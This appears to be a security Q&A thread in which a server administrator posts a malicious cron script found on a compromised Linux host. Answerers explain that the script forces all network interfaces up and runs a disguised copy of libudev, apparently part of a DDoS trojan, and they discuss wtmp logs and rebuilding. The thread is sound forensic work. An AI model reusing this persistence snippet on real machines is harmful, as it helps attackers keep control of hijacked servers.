1

My client's Linux server recently got compromised by unknown means (highly likely because of a weak password). When I first logged into the compromised server I discovered the following:

  • The Log files were wiped

  • SSH last login IP still had my IP and date and not the intruder's

  • Following malicious code in a cron was found:

#!/bin/sh
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/X11R6/bin
for i in `cat /proc/net/dev|grep:|awk -F {'print $1'}`; do ifconfig $i up& done
cp /lib/libudev.so /lib/libudev.so.6
/lib/libudev.so.6

I am doing a forensic investigation to find out what exploit was used and how the server was hacked. Current presumption is SSH password Bruteforce, but I have no evidence to prove it.

My questions would be:

  1. Where is the SSH last login stored? Was it tampered with?
  2. Why does the DDoS Virus maliciously deal with the libudev library?
  3. Do you know exactly which virus this is? I've seen a couple of other questions containing this kind of code, but no answer which kind of DDoS virus exactly it is.
  4. What does this code line do? 
    for i in `cat /proc/net/dev|grep:|awk -F {'print $1'}`; do ifconfig $i up& done

Thank you for your time.

AleksanderCH
  • 721
  • 4
  • 11
  • 23
Sir Muffington
  • 1,536
  • 2
  • 11
  • 23
  • *"Is the SSH last login message reliable or rather something easy to get tampered with?"* I am afraid the only way to tell for 100% sure is looking into the source code – Raymond Nijland Jun 17 '19 at 13:58
  • *"but no answer which kind of DDoS virus exactly it is."* it looks like it is the *"Unix Trojan.DDoS_XOR-1, Chinese Chicken Multiplatform DoS botnets Trojan "* – Raymond Nijland Jun 17 '19 at 14:15
  • `for i in `cat /proc/net/dev|grep:|awk -F {'print $1'}`; do ifconfig $i up& done` simply finds all your ethernet IP adresses to be passed to the `/lib/libudev.so.6` program – Raymond Nijland Jun 17 '19 at 14:21
  • *"Current presumption is SSH password Bruteforce, but I have no evidence to prove it. "* You could try to contact the ISP of your client to see if they will provide logs or atleast ask them if they see wierd traffic on the ssh port in the logs.. – Raymond Nijland Jun 17 '19 at 14:23
  • 1
    @RaymondNijland, I think the script tries to bring network interfaces up, not pass IP addresses. – VL-80 Jun 17 '19 at 14:37
  • *" I think the script tries to bring network interfaces up, not pass IP addresses"* indeed @VL-80 i misinterpret the code it indeed will start all the available network interfaces – Raymond Nijland Jun 17 '19 at 14:43

1 Answers1

1

The last login information is stored in a log file. If the attacker has wiped or expurged other log files, it's likely that they've wiped this one as well.

Specifically the last login information comes from the wtmp file, typically located at /var/log/wtmp.

The crontab entry enumerates the available network interfaces and brings them up. It's a crude way of making it harder to disconnect the machine from the network.

The last two lines of the crontab script copy /lib/libudev.so to /lib/libudev.so.6 and then executes /lib/libudev.so.6. The current version of libudev is 1, so this file wouldn't interfere with the normal working of the system, but I guess it wouldn't immediately jump out as suspicious if you happened to notice it in a directory listing.

Understanding how the malware works is interesting, but it's unlikely to help you find how it got there.

What you've found is pretty crude and obvious, but there's probably other less obvious stuff as well. As usual, the only way to get a clean system is to nuke this one and start from scratch.

Gilles 'SO- stop being evil'
  • 51,415
  • 13
  • 121
  • 180
  • Any clue why it targets the libudev? I found an interesting blog post about this kind of trojan https://blog.avast.com/2015/01/06/linux-ddos-trojan-hiding-itself-with-an-embedded-rootkit/ – Sir Muffington Jun 18 '19 at 16:09